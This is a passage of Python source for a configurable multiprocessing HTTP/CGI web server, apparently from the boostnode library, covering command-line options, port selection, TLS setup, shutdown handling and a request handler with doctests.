'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'Defines a key file (*.pem) to enable open ssl "
'''encryption (default: "%s").' % '''
"__initializer_default_value__.replace('%', "
"'%%')"},
'dest': 'key_file',
'metavar': 'PATH'}},
{'arguments': ('-o', '--stop-order'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': '"""Saves a cli-command for shutting down the '
'server (default: "%s").""" % '
'__initializer_default_value__'},
'dest': 'stop_order',
'metavar': 'STRING'}},
{'arguments': ('-w', '--request-whitelist'),
'specification': {
'action': 'store',
'nargs': '*',
'default': {'execute': '__initializer_default_value__'},
'type': builtins.str,
'required': {'execute': '__initializer_default_value__ is None'},
'help': 'Select request type regular expression patterns which '
'are the only ones allowed to be interpreted.',
'dest': 'request_whitelist',
'metavar': 'REGEX_PATTERN'}},
{'arguments': ('-b', '--request-blacklist'),
'specification': {
'action': 'store',
'nargs': '*',
'default': {'execute': '__initializer_default_value__'},
'type': builtins.str,
'required': {'execute': '__initializer_default_value__ is None'},
'help': 'Select request type regular expression patterns which '
"aren't allowed for being interpreted.",
'dest': 'request_blacklist',
'metavar': 'REGEX_PATTERN'}},
{'arguments': ('-K', '--known-big-web-mime-types'),
'specification': {
'action': 'store',
'nargs': '*',
'default': {'execute': '__initializer_default_value__'},
'type': builtins.str,
'required': {'execute': '__initializer_default_value__ is None'},
'help': 'A whitelist of file mime types which should be '
'associated with a typical browser extension. These files '
'will be sent with their respective mime type no matter '
'how big they are.',
'dest': 'known_big_web_mime_types',
'metavar': 'MIME_TYPES'}},
{'arguments': ('-I', '--internal-redirects'),
'specification': {
'action': 'store',
'nargs': '*',
'default': {'execute': '__initializer_default_value__'},
'type': builtins.str,
'required': {'execute': '__initializer_default_value__ is None'},
'help': 'Select a mapping (with "#" as delimiter) to redirect '
'url suffixes internally.',
'dest': 'internal_redirects',
'metavar': 'REGEX_PATTERN#REPLACEMENT'}},
{'arguments': ('-A', '--external-redirects'),
'specification': {
'action': 'store',
'nargs': '*',
'default': {'execute': '__initializer_default_value__'},
'type': builtins.str,
'required': {'execute': '__initializer_default_value__ is None'},
'help': 'Select a mapping (with "#" as delimiter) to redirect '
'url suffixes externally.',
'dest': 'external_redirects',
'metavar': 'REGEX_PATTERN#REPLACEMENT'}},
{'arguments': ('-s', '--static-mime-type-pattern'),
'specification': {
'action': 'store',
'nargs': '*',
'default': {'execute': '__initializer_default_value__'},
'type': builtins.str,
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'All mime-type patterns which should recognize a "
'static file. Those files will be directly sent to'
''' client without any preprocessing (default: '''
'"%s").\' % \'", "\'.join('
"__initializer_default_value__).replace('%', "
"'%%')"},
'dest': 'static_mime_type_pattern',
'metavar': 'REGEX_PATTERN'}},
{'arguments': ('-y', '--dynamic-mime-type-pattern'),
'specification': {
'action': 'store',
'nargs': '*',
'default': {'execute': '__initializer_default_value__'},
'type': builtins.str,
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'All mime-type patterns which should recognize a "
'dynamic file. Those files will be interpreted so '
'the result can be send back to client (default: '
'''"%s").' % '", "'.join('''
"__initializer_default_value__).replace('%', "
"'%%')"},
'dest': 'dynamic_mime_type_pattern',
'metavar': 'REGEX_PATTERN'}},
{'arguments': ('-C', '--compressible-mime-type-pattern'),
'specification': {
'action': 'store',
'nargs': '*',
'default': {'execute': '__initializer_default_value__'},
'type': builtins.str,
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'All mime-type patterns which should compressed "
'before sending through network socket (default: "'
'''%s").' % '", "'.join('''
"__initializer_default_value__).replace('%', "
"'%%')"},
'dest': 'compressible_mime_type_pattern',
'metavar': 'REGEX_PATTERN'}},
{'arguments': ('-f', '--default-file-name-pattern'),
'specification': {
'action': 'store',
'nargs': '*',
'default': {'execute': '__initializer_default_value__'},
'type': builtins.str,
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'All file name patterns which should be run if "
'there is one present and no other default file '
'pattern/name is given on initialisation (default:'
''' "%s").' % '", "'.join('''
"__initializer_default_value__).replace('%', "
"'%%')"},
'dest': 'default_file_name_pattern',
'metavar': 'REGEX_PATTERN'}},
{'arguments': ('-n', '--default-module-name-pattern'),
'specification': {
'action': 'store',
'nargs': '*',
'default': {'execute': '__initializer_default_value__'},
'type': builtins.str,
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'Same as file name for module name patterns. "
'Note that default files have a lower priority as '
'''default python modules (default: "%s").' % '''
"""'", "'.join(__initializer_default_value__)"""
".replace('%', '%%')"},
'dest': 'default_module_names',
'metavar': 'REGEX_PATTERN'}},
{'arguments': ('-q', '--file-size-stream-threshold-in-byte'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'Defines the minimum number of bytes which "
'triggers the server to send an octet-stream '
'''header to client (default: "%d").' % '''
'__initializer_default_value__'},
'dest': 'file_size_stream_threshold_in_byte',
'metavar': 'NUMBER'}},
{'arguments': ('-a', '--authentication'),
'specification': {
'action': 'store_true',
'default': {'execute': '__initializer_default_value__'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': 'Enables basic http authentication. You can control '
'this behavior by providing an authentication file in '
'directories you want to protect.',
'dest': 'authentication'}},
{'arguments': ('-e', '--enable-module-loading'),
'specification': {
'action': 'store_true',
'default': False,
'required': False,
'help': 'Enables module loading via get query. Enabling this '
'feature can slow down your request performance '
'extremely. Note that self module loading via "__main__" '
'is possible independently.',
'dest': 'module_loading'}},
{'arguments': ('-z', '--disable-directory-listing'),
'specification': {
'action': 'store_false',
'default': True,
'required': False,
'help': 'Disables automatic directory listing if a directory is '
'requested.',
'dest': 'directory_listing'}},
{'arguments': ('-g', '--authentication-file-content-pattern'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'Defines the regular expression pattern to define"
' how to parse authentication files (default: '
'''"%s").' % __initializer_default_value__.'''
"replace('%', '%%')"},
'dest': 'authentication_file_content_pattern',
'metavar': 'REGEX_PATTERN'}},
{'arguments': ('-i', '--authentication-file-name-pattern'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'Defines the authentication file name (default: "
'''"%s").' % __initializer_default_value__.'''
"replace('%', '%%')"},
'dest': 'authentication_file_name',
'metavar': 'STRING'}},
{'arguments': ('-j', '--request-parameter-delimiter'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'Defines the request delimiter parameter "
'''(default: "%s").' % '''
"__initializer_default_value__.replace('%', "
"'%%')"},
'dest': 'request_parameter_delimiter',
'metavar': 'STRING'}},
{'arguments': ('-E', '--encoding'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'Sets encoding for interpreting binary data like "
'post or authentication requests, decoding given '
"url\\'s or encoding compressed gzip data for "
'''clients (default: "%s").' % '''
"__initializer_default_value__.replace('%', "
"'%%')"},
'dest': 'encoding',
'metavar': 'STRING'}},
{'arguments': ('-k', '--maximum-number-of-processes'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'Defines the maximum number of concurrent running"
' processes. If set to zero a useful value '
'depending on detected processor will be '
'''determined (default: "%d").' % '''
'__initializer_default_value__'},
'dest': 'maximum_number_of_processes',
'metavar': 'NUMBER'}})
'''Holds all command line interface argument information.'''
HIGHEST_AVAILABLE_PORT = 2 ** 16 - 1
'''Saves the highest available port to launch server.'''
DETERMINE_IP_SOCKET = '8.8.8.8', 80
'''
Globally accessible socket address used to determine the currently useful ip.
'''
DEFAULT_NUMBER_OF_PROCESSES = 8
'''
This is the maximum number of forked processes if nothing better was \
defined or determined.
'''
MAXIMUM_FIRST_GET_REQUEST_LINE_IN_CHARS = 65537
'''This value describes the longest possible first get request line.'''
STATUS_PREFIX_CODE_LOGGING_COLOR_MAPPING = {
2: OUTPUT_COLOR['foreground']['green'],
3: OUTPUT_COLOR['foreground']['blue'],
4: OUTPUT_COLOR['foreground']['yellow'],
5: OUTPUT_COLOR['foreground']['red']
}
'''Maps a highlighting color to each http status code prefix.'''
instances = []
'''Saves all initialized server instances.'''
# endregion
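# NOTE: A minimal, hypothetical command line invocation covering some of the
# arguments declared above (the module path is an assumption, not taken from
# this file):
#
#     python -m boostnode.runnable.server --port 8080 --authentication \
#         --disable-directory-listing
#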
# region dynamic methods
# # region public
# # # region special
@JointPoint
# # python3.5
# # def __repr__(self: Self) -> builtins.str:
def __repr__(self):
# #
'''
Invoked if this object should describe itself by a string.
Examples:
>>> repr(Web()) # doctest: +ELLIPSIS
'Object of "Web" with root path "...", port "0" and sto..."sto...'
'''
return (
'Object of "{class_name}" with root path "{path}", port "{port}" '
'and stop order "{stop_order}". Number of running '
'threads/processes: {number_of_running_threads}/'
'{number_of_running_processes}.'.format(
class_name=self.__class__.__name__, path=self.root,
port=self.port, stop_order=self.stop_order,
number_of_running_threads=self.number_of_running_threads,
number_of_running_processes=self.number_of_running_processes))
# # # endregion
@JointPoint
# # python3.5
# # def stop(
# # self: Self, *arguments: builtins.object, force_stopping=False,
# # **keywords: builtins.object
# # ) -> Self:
def stop(self, *arguments, **keywords):
# #
'''
Waits for running workers and shuts the server down.
Arguments and keywords are forwarded to \
"boostnode.extension.system.Run.stop()".
Examples:
>>> web = Web()
>>> web.stop() # doctest: +ELLIPSIS
Object of "Web" with root path "...", port "0" and stop order "...
>>> web.service = True
>>> web.stop() # doctest: +ELLIPSIS
Object of "Web" with root path "...", port "0" and stop order "s...
'''
# # python3.5
# # pass
force_stopping, keywords = Dictionary(keywords).pop_from_keywords(
name='force_stopping', default_value=False)
# #
if self.__dict__.get('service'):
self.block_new_worker = True
# TODO check new branches.
number_of_running_workers = self.number_of_running_threads + \
builtins.len(multiprocessing.active_children())
if force_stopping:
if number_of_running_workers:
__logger__.info(
'Enforcing web server child processes to stop.')
for worker in multiprocessing.active_children():
os.kill(worker.pid, signal.SIGKILL)
return self
else:
self._stop_graceful(number_of_running_workers)
if not __test_mode__:
'''Terminates the serve forever loop.'''
self.service.shutdown()
try:
'''
Tells the client side to stop writing data into the socket.
'''
self.service.socket.shutdown(socket.SHUT_RDWR)
except socket.error as exception:
# # python3.5
# # __logger__.warning(
# # 'Connection couldn\'t be released on both sides. '
# # '%s: %s', exception.__class__.__name__,
# # builtins.str(exception))
__logger__.warning(
'Connection couldn\'t be released on both sides. '
'%s: %s', exception.__class__.__name__,
convert_to_unicode(exception))
# #
'''Tells the kernel to free the bound port.'''
self.service.socket.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.service.socket.close()
'''Take this method type from abstract class via introspection.'''
return builtins.getattr(
builtins.super(self.__class__, self), inspect.stack()[0][3]
)(*arguments, force_stopping=force_stopping, **keywords)
# # endregion
# # region protected
# # # region runnable implementation
@JointPoint
# # python3.5 def _run(self: Self) -> Self:
def _run(self):
'''
Entry point for command line call of this program. Starts the \
server's request handler listening for incoming requests.
Examples:
>>> sys_argv_backup = copy(sys.argv)
>>> sys.argv[1:] = ['--port', '8080']
>>> Web()._run() # doctest: +ELLIPSIS
Object of "Web" with root path "...", port "8080" and stop order...
>>> sys.argv[3:] = [
... '--internal-redirects', 'a#b', 'c#dd',
... '--external-redirects', 'ee#f']
>>> Web()._run() # doctest: +ELLIPSIS
Object of "Web" with root path "...", port "8080" and stop order...
>>> Web.run() # doctest: +ELLIPSIS
Object of "Web" with root path "...", port "8080" and stop order...
>>> sys.argv = sys_argv_backup
'''
command_line_arguments = CommandLine.argument_parser(
arguments=self.COMMAND_LINE_ARGUMENTS,
module_name=__name__, scope={'self': self})
command_line_arguments.internal_redirects = builtins.tuple(
builtins.map(
lambda redirect: redirect.split('#'),
command_line_arguments.internal_redirects))
command_line_arguments.external_redirects = builtins.tuple(
builtins.map(
lambda redirect: redirect.split('#'),
command_line_arguments.external_redirects))
return self._initialize(**self._command_line_arguments_to_dictionary(
namespace=command_line_arguments))
@JointPoint(InstancePropertyInitializer)
# # python3.5
# # def _initialize(
# # self: Self, root=None, host_name='', port=0, default='',
# # key_file=None, stop_order='stop', encoding=ENCODING,
# # request_whitelist=('*:/.*',), request_blacklist=(),
# # same_process_request_whitelist=(),
# # same_process_request_blacklist=(),
# # # NOTE: Tuple for explicit web server file reference validation.
# # # ('text/.+$', 'image/.+$', 'application/(x-)?javascript$')
# # static_mime_type_pattern=('.+/.+$',),
# # dynamic_mime_type_pattern=(
# # 'text/x-(python|sh|bash|shellscript)$',),
# # compressible_mime_type_pattern=(
# # 'text/.+$', 'application/javascript$'),
# # default_file_name_pattern=(
# # 'index(?!\.(tpl|js)$)(?:\.[a-zA-Z0-9]{0,4})?$',
# # '(?:index|__main__|main|initialize)(?!\.tpl$)'
# # '(?:\.[a-zA-Z0-9]{0,4})?$'
# # default_module_names=('index', '__main__', 'main', 'initialize'),
# # authentication=True, authentication_file_name='.htpasswd',
# # authentication_file_content_pattern=
# # '(?P<name>.+):(?P<password>.+)',
# # authentication_handler=None, module_loading=None,
# # maximum_number_of_processes=0, shared_data=None,
# # request_parameter_delimiter='\?',
# # file_size_stream_threshold_in_byte=8388608, # 8 MB
# # directory_listing=True, internal_redirects=None,
# # external_redirects=None,
# # known_big_web_mime_types=('application/x-shockwave-flash',),
# # **keywords: builtins.object
# # ) -> Self:
def _initialize(
self, root=None, host_name='', port=0, default='',
key_file=None, stop_order='stop', encoding=ENCODING,
request_whitelist=('*:/.*',), request_blacklist=(),
same_process_request_whitelist=(),
same_process_request_blacklist=(),
# NOTE: Tuple for explicit web server file reference validation.
# ('text/.+$', 'image/.+$', 'application/(x-)?javascript$')
static_mime_type_pattern=('.+/.+$',),
dynamic_mime_type_pattern=(
'text/x-(python|sh|bash|shellscript)$',),
compressible_mime_type_pattern=(
'text/.+$', '^application/javascript$'),
default_file_name_pattern=(
'index(?!\.(tpl|js)$)(?:\.[a-zA-Z0-9]{0,4})?$',
'(?:index|__main__|main|initialize)(?!\.tpl$)'
'(?:\.[a-zA-Z0-9]{0,4})?$'
), default_module_names=('index', '__main__', 'main', 'initialize'),
authentication=True, authentication_file_name='.htpasswd',
authentication_file_content_pattern=
'(?P<name>.+):(?P<password>.+)',
authentication_handler=None, module_loading=None,
maximum_number_of_processes=0, shared_data=None,
request_parameter_delimiter='\?',
file_size_stream_threshold_in_byte=8388608, # 8 MB
directory_listing=True, internal_redirects=None,
external_redirects=None,
known_big_web_mime_types=('application/x-shockwave-flash',),
**keywords
):
# #
'''
Sets the root path of the web server and all properties. Afterwards \
the server thread will be started.
'''
self.__class__.instances.append(self)
# # # region properties
if self.internal_redirects is None:
self.internal_redirects = ()
if self.external_redirects is None:
self.external_redirects = ()
'''Indicates if new workers are currently allowed to spawn.'''
self.block_new_worker = False
'''Saves server runtime properties.'''
self.root = FileHandler(location=self.root)
self.thread_buffer = Buffer(queue=True)
'''Saves the number of running threads.'''
self.number_of_running_threads = 0
'''Saves the server thread service.'''
self.service = None
'''
Saves the number of running process forked by this server instance.
'''
self.number_of_running_processes = 0
if Platform.operating_system == 'windows':
self.maximum_number_of_processes = 1
elif not self.maximum_number_of_processes:
try:
self.maximum_number_of_processes = \
2 * multiprocessing.cpu_count()
except builtins.NotImplementedError:
self.maximum_number_of_processes = \
self.DEFAULT_NUMBER_OF_PROCESSES
'''
Saves information about how to define authentication in protected \
directories.
'''
if self.key_file:
self.key_file = FileHandler(location=self.key_file)
if not self.key_file.is_file():
raise __exception__(
'Given public key file path "%s" doesn\'t point to a '
'file.', self.key_file._path)
# # # endregion
return self._start_server_thread()
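# NOTE: A minimal usage sketch, assuming the constructor forwards its
# keywords to "_initialize()":
#
#     web = Web(root='.', port=8080, authentication=False)
#     web.stop()
#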
# # endregion
@JointPoint
# # python3.5
# # def _stop_graceful(
# # self: Self, number_of_running_workers: builtins.int
# # ) -> Self:
def _stop_graceful(self, number_of_running_workers):
# #
'''Waits until all child processes and threads have been terminated.'''
shown_number = 0
while number_of_running_workers > 0:
if(number_of_running_workers !=
self.number_of_running_threads +
builtins.len(multiprocessing.active_children())):
number_of_running_workers = \
self.number_of_running_threads + \
builtins.len(multiprocessing.active_children())
if(shown_number != number_of_running_workers and
number_of_running_workers > 0):
__logger__.info(
'Waiting for %d running workers (%d threads and '
'%d processes).', number_of_running_workers,
self.number_of_running_threads,
builtins.len(multiprocessing.active_children()))
shown_number = number_of_running_workers
time.sleep(2)
__logger__.info('Shutting down web server.')
self.__class__.instances.remove(self)
return self
@JointPoint
# # python3.5 def _start_server_thread(self: Self) -> Self:
def _start_server_thread(self):
'''
Starts the server's request handler instance and listens for the \
stop order.
'''
if self.port:
self._start_with_static_port()
else:
self._start_with_dynamic_port()
self._log_server_status()
if not __test_mode__ and self.stop_order:
self.wait_for_order()
return self
@JointPoint
# # python3.5 def _log_server_status(self: Self) -> Self:
def _log_server_status(self):
'''Prints some information about the way the server was started.'''
determine_ip_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ip = socket.gethostbyname(socket.gethostname())
if self.host_name == '':
try:
determine_ip_socket.connect(self.DETERMINE_IP_SOCKET)
# # python3.5
# # except(
# # builtins.BrokenPipeError, socket.gaierror, socket.herror,
# # socket.timeout, socket.error
# # ) as exception:
except(
socket.herror, socket.gaierror, socket.timeout,
socket.error
):
# #
pass
else:
ip = determine_ip_socket.getsockname()[0]
finally:
try:
determine_ip_socket.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
determine_ip_socket.close()
__logger__.info(
'Web server is starting%s, listening at port "%d" and webroot is '
'"%s". Currently reachable ip is "%s". Maximum parallel processes '
'is limited to %d.', (
' a secure connection with public key "%s" ' %
self.key_file._path
) if self.key_file else '', self.port, self.root._path,
ip, self.maximum_number_of_processes)
return self
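# NOTE: A standalone sketch of the ip determination trick used above; for a
# UDP socket "connect()" only selects a route, no packet is actually sent:
#
#     import socket
#     probe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#     try:
#         probe.connect(('8.8.8.8', 80))
#         print(probe.getsockname()[0])
#     finally:
#         probe.close()
#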
@JointPoint
# # python3.5 def _start_with_dynamic_port(self: Self) -> Self:
def _start_with_dynamic_port(self):
'''Searches for a free port to listen on (preferring common web ports).'''
ports = [
80, 8080, 8008, 8090, 8280, 8887, 9080, 16080, 3128, 4567,
5000, 4711, 443, 5001, 5104, 5800, 8243, 8888]
if self.key_file:
ports = [443] + ports
ports += builtins.list(builtins.set(
builtins.range(self.HIGHEST_AVAILABLE_PORT)
).difference(ports))
if not __test_mode__:
for port in ports:
try:
self._initialize_server_thread(port)
except socket.error:
if port == self.HIGHEST_AVAILABLE_PORT:
# # python3.5
# # raise __exception__(
# # 'No port is available to run the web-server '
# # 'with given rights.'
# # ) from None
raise __exception__(
'No port is available to run the web-server '
'with given rights.')
# #
else:
self.port = port
return self
return self
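# NOTE: A minimal sketch (not part of this class) showing how a single port
# could be probed for availability by trying to bind it:
#
#     import socket
#     def port_is_free(port, host=''):
#         probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#         try:
#             probe.bind((host, port))
#             return True
#         except socket.error:
#             return False
#         finally:
#             probe.close()
#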
@JointPoint
# # python3.5 def _start_with_static_port(self: Self) -> Self:
def _start_with_static_port(self):
'''Starts the server listening on the given port, if it is free.'''
if not __test_mode__:
try:
self._initialize_server_thread(port=self.port)
except socket.error:
# # python3.5
# # raise __exception__(
# # "Port %d isn't available to run the web-server with "
# # 'given rights.', self.port
# # ) from None
raise __exception__(
"Port %d isn't available to run the web-server with "
'given rights.', self.port)
# #
return self
@JointPoint
# # python3.5
# # def _serve_service_forever_exception_catcher(self: Self) -> Self:
def _serve_service_forever_exception_catcher(self):
# #
'''
This method wraps python's native server "serve_forever()" \
method to handle incoming exceptions in a separate thread.
'''
try:
return self.service.serve_forever()
# # python3.5
# # except builtins.ValueError as exception:
# # __logger__.warning(
# # '%s: %s', exception.__class__.__name__,
# # builtins.str(exception))
except socket.error as exception:
__logger__.warning(
'%s: %s', exception.__class__.__name__,
convert_to_unicode(exception))
# #
return self
@JointPoint
# # python3.5
# # def _initialize_server_thread(
# # self: Self, port: builtins.int
# # ) -> Self:
def _initialize_server_thread(self, port):
# #
'''Initializes a new request-handler and starts its own thread.'''
self.service = MultiProcessingHTTPServer(
(self.host_name, port), CGIHTTPRequestHandler)
if self.key_file:
self.service.socket = ssl.wrap_socket(
self.service.socket, certfile=self.key_file._path,
server_side=True)
self.service.web = self
# # python3.5
# # threading.Thread(
# # target=self._serve_service_forever_exception_catcher,
# # daemon=True
# # ).start()
server_thread = threading.Thread(
target=self._serve_service_forever_exception_catcher)
server_thread.daemon = True
server_thread.start()
# #
return self
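# NOTE: "ssl.wrap_socket()" used above is deprecated on newer python
# versions (and removed in 3.12); an equivalent sketch with an explicit
# context would look like this (certificate path and "plain_socket" are
# hypothetical placeholders):
#
#     import ssl
#     context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
#     context.load_cert_chain(certfile='/path/to/certificate.pem')
#     secure_socket = context.wrap_socket(plain_socket, server_side=True)
#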
# # endregion
# endregion
# # python3.5
# # class CGIHTTPRequestHandler(server.CGIHTTPRequestHandler):
class CGIHTTPRequestHandler(
cgi_http_server.CGIHTTPRequestHandler, builtins.object
):
# #
'''
A small request-handler dealing with incoming file requests. It can \
directly send static files back to the client or run dynamic scripts and \
give the output back to the client.
'''
# region dynamic methods
# # region public
# # # region special
@JointPoint
# # python3.5
# # def __init__(
# # self, request_socket: socket.socket,
# # request_address: builtins.tuple,
# # server: MultiProcessingHTTPServer, *arguments: builtins.object,
# # **keywords: builtins.object
# # ) -> None:
# # '''
# # This method calls its parent. It's necessary to make some class
# # properties instance properties.
# # '''
def __init__(
self, request_socket, request_address, server, *arguments,
**keywords
):
# #
'''
Initializes all used properties and calls the super method.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server
... ) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
'''
# # # region properties
'''Saves current server instance.'''
self.server = server
'''Properties defined by incoming request.'''
self.host = ''
self.uri = ''
self.external_uri = ''
self.parameter = ''
self.get = {}
self.data = {}
self.cookie = {}
self.type = ''
self.external_type = ''
self.data_type = ''
'''Saves the last started worker thread instance.'''
self.last_running_worker = None
'''
Contains the explicitly requested file name (like python's native \
"self.file") coming from the client.
'''
self.requested_file_name = ''
'''References the file handler corresponding to the requested file name.'''
self.requested_file = None
'''
Defines whether the handler has decided to run a python module or \
an external script.
'''
self.load_module = False
'''
Defines arguments given to a requested file which is run by \
the server.
'''
self.request_arguments = []
'''Indicates if an answer is expected from the requested file.'''
self.respond = False
self.response_sent = self.headers_ended = self.content_type_sent = \
self.content_length_sent = False
# # python3.5
# # '''Saves the error message format.'''
# # self.error_message_format = (
# # '<!doctype html>\n'
# # '<html lang="en">\n'
# # ' <head>\n'
# # ' <meta charset="{charset}">\n'
# # ' <meta name="robots" content="noindex, follow" />\n'
# # ' <meta name="viewport" content="width=device-width, '
# # 'initial-scale=1.0" />\n'
# # ' <title>Error response</title>\n'
# # ' </head>\n'
# # ' <body>\n'
# # ' <h1>Error response</h1>\n'
# # ' <p>\n'
# # ' Error code '
# # '<span style="color: red">%(code)d</span>.\n'
# # ' </p>\n'
# # ' <p>Message:</p>\n'
# # ' <pre>%(message)s.</pre>\n'
# # ' <p>Error code explanation: %(code)s</p>\n'
# # ' <p>%(explain)s.</p>\n'
# # ' </body>\n'
# # '</html>').format(charset=self.server.web.encoding.replace(
# # '_', '-'))
'''
Saves the error message format. NOTE: Has to be a native \
string to avoid encoding errors in python's native underlying \
request handler logic.
'''
self.error_message_format = convert_to_string(
'<!doctype html>\n'
'<html lang="en">\n'
' <head>\n'
' <meta charset="{charset}">\n'
' <meta name="robots" content="noindex, follow" />\n'
' <meta name="viewport" content="width=device-width, '
'initial-scale=1.0" />\n'
' <title>Error response</title>\n'
' </head>\n'
' <body>\n'
' <h1>Error response</h1>\n'
' <p>\n'
' Error code '
'<span style="color: red">%(code)d</span>.\n'
' </p>\n'
' <p>Message:</p>\n'
' <pre>%(message)s.</pre>\n'
' <p>Error code explanation: %(code)s</p>\n'
' <p>%(explain)s.</p>\n'
' </body>\n'
'</html>').format(charset=self.server.web.encoding.replace(
'_', '-'))
# #
'''Saves the error content type header.'''
# # python3.5
# # self.error_content_type = 'text/html; charset=%s' % \
# # self.server.web.encoding.replace('_', '-')
self.error_content_type = convert_to_string(
'text/html; charset=%s' % self.server.web.encoding.replace(
'_', '-'))
# #
'''
Saves the self-describing server version string. This string is \
included in every response.
'''
self.server_version = '{program} {version} {status}'.format(
program=String(__module_name__).camel_case_capitalize.content,
version=__version__, status=__status__)
'''Saves gziped encoded output.'''
self._encoded_output = None
'''
Points to the location which is authoritative for deciding whether the \
requested destination is reachable.
'''
self._authentication_location = None
# # # endregion
if not __test_mode__:
'''Take this method via introspection.'''
return builtins.getattr(
builtins.super(self.__class__, self), inspect.stack()[0][3]
)(request_socket, request_address, server, *arguments, **keywords)
@JointPoint
# # python3.5 def __repr__(self: Self) -> builtins.str:
def __repr__(self):
'''
Invoked if this object should describe itself by a string.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> repr(CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server
... )) # doctest: +SKIP
'Object of "CGIHTTPRequestHandler" with request uri "" and para...'
'''
return 'Object of "{class_name}" with request uri "{url}" and '\
'parameter "{parameter}".'.format(
class_name=self.__class__.__name__, url=self.uri,
parameter=self.parameter)
# # # endregion
# # # region event
@JointPoint
# # python3.5 def do_GET(self: Self) -> Self:
def do_GET(self):
'''
Is triggered if an incoming get request is detected. Decides if \
the request is valid and static or dynamic. It also throws an \
exception and sends an http error if the request isn't valid.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.path = '/'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('test: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/" and param...
>>> handler.path = ''
>>> handler.server.web.directory_listing = False
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.server.web.authentication = True
>>> handler.server.web.authentication_handler = (
... lambda login_data, request_handler: (False, None))
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('key: value'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('key', 'value')
>>> # #
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String(
... 'Authorization: Basic ' +
... base64_encode('hans:hans')
... ), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header(
... 'Authorization',
... 'Basic ' + base64_encode(b'hans:hans').decode(
... handler.server.web.encoding))
>>> # #
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('authorization: value'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('authorization', 'value')
>>> # #
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.path = '/not_existing_file'
>>> handler.server.web.request_whitelist = '*:/not_existing_file',
>>> handler.server.web.authentication_handler = (
... lambda login_data, request_handler: (True, None))
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/not_existin...
>>> file = FileHandler(__test_folder__.path + 'do_GET')
>>> file.content = ''
>>> handler.path = '/' + file.name
>>> handler.server.web.request_whitelist = '*:/%s' % file.name,
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/do_GET" ...
>>> handler.path = 'not_in_whitlist'
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "not_in_whitl...
>>> handler.server.web.request_whitelist = '*:/%s' % file.name,
>>> handler.path = '/do_GET'
>>> handler.server.web.external_redirects = (('GET:.*', ''),)
>>> handler.do_GET() # doctest: +ELLIPSIS
